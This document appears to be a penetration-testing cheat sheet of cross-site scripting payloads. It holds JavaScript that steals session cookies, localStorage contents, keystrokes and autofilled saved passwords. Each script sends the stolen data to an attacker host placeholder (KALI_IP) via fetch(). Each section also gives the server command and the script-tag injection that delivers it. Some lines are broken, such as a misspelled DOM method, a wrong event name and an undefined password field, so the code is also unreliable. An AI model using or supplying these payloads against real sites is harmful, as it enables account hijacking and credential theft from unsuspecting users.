Stealing Session Cookies
XSS file that we deliver as payload: malicious.js
let cookie = document.cookie;
let encodedCookie = encodeURIComponent(cookie);
fetch("http://KALI_IP/victim?data=" + encodedCookie);
- Start the web server:
python3 -m http.server 80
- The Payload:
<script src="http://KALI_IP/malicious.js"></script>
Stealing Local Storage
XSS file that we deliver as payload: malicious.js
let data = JSON.stringify(localStorage);
let encodedData = encodeURIComponent(data);
fetch("http://KALI_IP/victim?data=" + encodedData);
- Start the web server:
python3 -m http.server 80
- The Payload:
<script src="http://KALI_IP/malicious.js"></script>
Keylogger
function keylogger(event){
fetch("http://KALI_IP/victim?keystroke=" + event.key);
}
document.addEventListener('key', keylogger);
- Start the web server:
python3 -m http.server 80
- The Payload:
<script src="http://KALI_IP/malicious.js"></script>
Stealing Saved Passwords
!WARNING
If a password manager auto fill the login prompt we can abuse that functionality and steal the credentials
If a password manager auto fill the login prompt we can abuse that functionality and steal the credentials
XSS file that we deliver as payload: malicious.js
let body = document.getElementByTagName("body")[0];
var u = document.createElement("input");
u.type = "text";
u.style.position = "fixed";
u.style.opacity = "0";
body.append(u);
body.append(p);
setTimeout(function(){
fetch("http://KALI_IP/victim?username=" + u.value + "&password=" + p.value);
}, 3000);
- Start the web server:
python3 -m http.server 80
- The Payload:
<script src="http://KALI_IP/malicious.js"></script>